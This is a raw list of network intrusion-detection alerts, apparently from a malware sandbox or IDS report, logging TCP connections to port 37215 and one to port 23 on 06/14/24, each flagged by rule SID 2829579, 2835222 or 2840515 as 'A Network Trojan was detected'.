                Timestamp:06/14/24-10:44:18.766211
                SID:2829579
                Source Port:42438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053276
                SID:2835222
                Source Port:43230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242990
                SID:2835222
                Source Port:54834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701893
                SID:2835222
                Source Port:34078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662476
                SID:2829579
                Source Port:37946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074555
                SID:2829579
                Source Port:43216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018597
                SID:2835222
                Source Port:59676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985178
                SID:2829579
                Source Port:47474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762174
                SID:2835222
                Source Port:32992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684669
                SID:2829579
                Source Port:33448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020203
                SID:2829579
                Source Port:52748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807388
                SID:2835222
                Source Port:52318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131881
                SID:2829579
                Source Port:50498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969111
                SID:2829579
                Source Port:58336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322718
                SID:2835222
                Source Port:52678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848698
                SID:2835222
                Source Port:37958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024153
                SID:2835222
                Source Port:32962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.231072
                SID:2829579
                Source Port:54414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683750
                SID:2835222
                Source Port:44302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762336
                SID:2829579
                Source Port:50272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056326
                SID:2835222
                Source Port:59306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625231
                SID:2829579
                Source Port:35506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811588
                SID:2829579
                Source Port:33312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915854
                SID:2835222
                Source Port:51220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971652
                SID:2829579
                Source Port:44160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941509
                SID:2829579
                Source Port:56880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615130
                SID:2829579
                Source Port:37564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292987
                SID:2835222
                Source Port:47548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669074
                SID:2829579
                Source Port:52492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134363
                SID:2829579
                Source Port:60018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988081
                SID:2835222
                Source Port:33380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198926
                SID:2835222
                Source Port:57938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176785
                SID:2829579
                Source Port:52882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848466
                SID:2829579
                Source Port:38270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163190
                SID:2829579
                Source Port:49538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728584
                SID:2829579
                Source Port:44822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675706
                SID:2829579
                Source Port:47012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645993
                SID:2835222
                Source Port:53696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051967
                SID:2835222
                Source Port:34916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448974
                SID:2835222
                Source Port:36972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618233
                SID:2835222
                Source Port:33634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905964
                SID:2829579
                Source Port:57328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997232
                SID:2835222
                Source Port:46144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164042
                SID:2829579
                Source Port:56344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806813
                SID:2835222
                Source Port:33994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810168
                SID:2835222
                Source Port:58192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902300
                SID:2829579
                Source Port:41112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245783
                SID:2835222
                Source Port:53136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451624
                SID:2835222
                Source Port:45518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682015
                SID:2835222
                Source Port:56818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717996
                SID:2835222
                Source Port:42142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898097
                SID:2835222
                Source Port:41292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202206
                SID:2835222
                Source Port:52954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295287
                SID:2835222
                Source Port:44920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644886
                SID:2829579
                Source Port:54598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472556
                SID:2835222
                Source Port:55690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200501
                SID:2829579
                Source Port:41658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250434
                SID:2829579
                Source Port:54196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671207
                SID:2835222
                Source Port:60668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718753
                SID:2835222
                Source Port:57320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989842
                SID:2835222
                Source Port:45198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846091
                SID:2835222
                Source Port:55630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916883
                SID:2829579
                Source Port:43176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986152
                SID:2835222
                Source Port:55784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917827
                SID:2829579
                Source Port:51548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344304
                SID:2835222
                Source Port:40320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.833219
                SID:2840515
                Source Port:47002
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227336
                SID:2829579
                Source Port:38314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501189
                SID:2829579
                Source Port:54726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905822
                SID:2835222
                Source Port:35942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011964
                SID:2829579
                Source Port:39738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290981
                SID:2829579
                Source Port:60768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504591
                SID:2829579
                Source Port:34266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942406
                SID:2829579
                Source Port:37212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775984
                SID:2829579
                Source Port:58408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183350
                SID:2835222
                Source Port:49256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326075
                SID:2835222
                Source Port:43778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342950
                SID:2829579
                Source Port:42390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762699
                SID:2835222
                Source Port:42398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807018
                SID:2829579
                Source Port:51014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277786
                SID:2829579
                Source Port:54934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504636
                SID:2829579
                Source Port:36460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294216
                SID:2829579
                Source Port:40322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451462
                SID:2829579
                Source Port:44826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452861
                SID:2829579
                Source Port:40644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966779
                SID:2829579
                Source Port:60408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.613897
                SID:2829579
                Source Port:45596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878283
                SID:2835222
                Source Port:45186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088957
                SID:2835222
                Source Port:48800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502242
                SID:2835222
                Source Port:58938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411672
                SID:2835222
                Source Port:60848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686462
                SID:2829579
                Source Port:56512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053043
                SID:2829579
                Source Port:48644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071285
                SID:2835222
                Source Port:44126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.278049
                SID:2835222
                Source Port:42220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772579
                SID:2829579
                Source Port:41396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762013
                SID:2829579
                Source Port:51372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339195
                SID:2829579
                Source Port:41972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243713
                SID:2835222
                Source Port:50350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791971
                SID:2835222
                Source Port:43142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111424
                SID:2829579
                Source Port:42032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980041
                SID:2835222
                Source Port:54958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504925
                SID:2835222
                Source Port:54988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051652
                SID:2835222
                Source Port:59732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471822
                SID:2829579
                Source Port:47626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.181537
                SID:2829579
                Source Port:38432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944112
                SID:2835222
                Source Port:57272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812290
                SID:2829579
                Source Port:47484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020534
                SID:2835222
                Source Port:43838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453229
                SID:2829579
                Source Port:45150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246021
                SID:2835222
                Source Port:39758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091447
                SID:2829579
                Source Port:41532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567434
                SID:2835222
                Source Port:51252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777722
                SID:2829579
                Source Port:36186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689041
                SID:2829579
                Source Port:37972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201773
                SID:2829579
                Source Port:36734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451741
                SID:2835222
                Source Port:39064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180815
                SID:2829579
                Source Port:33102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200040
                SID:2829579
                Source Port:48350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717805
                SID:2829579
                Source Port:51316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449449
                SID:2835222
                Source Port:42478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646314
                SID:2835222
                Source Port:49968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717626
                SID:2835222
                Source Port:43988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184012
                SID:2835222
                Source Port:43082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025431
                SID:2835222
                Source Port:54786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688942
                SID:2829579
                Source Port:47202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672102
                SID:2829579
                Source Port:33012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091579
                SID:2835222
                Source Port:36358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942098
                SID:2835222
                Source Port:44310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916915
                SID:2835222
                Source Port:57462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229219
                SID:2835222
                Source Port:49740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505285
                SID:2835222
                Source Port:46052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564635
                SID:2835222
                Source Port:52558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179576
                SID:2829579
                Source Port:50184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684277
                SID:2829579
                Source Port:46206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761970
                SID:2829579
                Source Port:49472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501917
                SID:2829579
                Source Port:34734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980837
                SID:2829579
                Source Port:36616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641967
                SID:2835222
                Source Port:39516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057633
                SID:2835222
                Source Port:52628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163912
                SID:2829579
                Source Port:35054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369269
                SID:2829579
                Source Port:48026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715309
                SID:2829579
                Source Port:37440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016256
                SID:2835222
                Source Port:41066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881773
                SID:2829579
                Source Port:44038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165201
                SID:2829579
                Source Port:42960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917863
                SID:2835222
                Source Port:46840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070349
                SID:2829579
                Source Port:35520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989628
                SID:2829579
                Source Port:41676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381198
                SID:2835222
                Source Port:55136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177623
                SID:2829579
                Source Port:36404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967973
                SID:2829579
                Source Port:49356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322423
                SID:2835222
                Source Port:33168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641640
                SID:2829579
                Source Port:40756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687040
                SID:2829579
                Source Port:60984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471048
                SID:2835222
                Source Port:34180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807803
                SID:2835222
                Source Port:36538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563429
                SID:2835222
                Source Port:57136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676197
                SID:2829579
                Source Port:56984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012155
                SID:2835222
                Source Port:37124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970844
                SID:2835222
                Source Port:47164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185586
                SID:2829579
                Source Port:37726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646973
                SID:2829579
                Source Port:41976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684863
                SID:2829579
                Source Port:39890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548232
                SID:2835222
                Source Port:56712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640861
                SID:2829579
                Source Port:35752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151165
                SID:2835222
                Source Port:48266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715391
                SID:2829579
                Source Port:58632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715825
                SID:2829579
                Source Port:36264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421203
                SID:2835222
                Source Port:57458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967363
                SID:2829579
                Source Port:49430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277855
                SID:2829579
                Source Port:49498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185459
                SID:2829579
                Source Port:35874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091491
                SID:2835222
                Source Port:44436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198638
                SID:2829579
                Source Port:37312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056143
                SID:2829579
                Source Port:48674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056030
                SID:2829579
                Source Port:44204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702985
                SID:2835222
                Source Port:53754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229393
                SID:2829579
                Source Port:39706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718621
                SID:2835222
                Source Port:58416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017962
                SID:2835222
                Source Port:59246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073426
                SID:2829579
                Source Port:55992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806178
                SID:2829579
                Source Port:59006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051268
                SID:2829579
                Source Port:49996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775538
                SID:2835222
                Source Port:55706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944327
                SID:2835222
                Source Port:43960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183003
                SID:2829579
                Source Port:38954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646421
                SID:2829579
                Source Port:57738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717684
                SID:2835222
                Source Port:38614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034500
                SID:2829579
                Source Port:46036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641289
                SID:2829579
                Source Port:35424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662112
                SID:2835222
                Source Port:47910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368771
                SID:2835222
                Source Port:41330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369216
                SID:2829579
                Source Port:51326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406694
                SID:2829579
                Source Port:47722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410693
                SID:2829579
                Source Port:35736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383695
                SID:2829579
                Source Port:52188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.231018
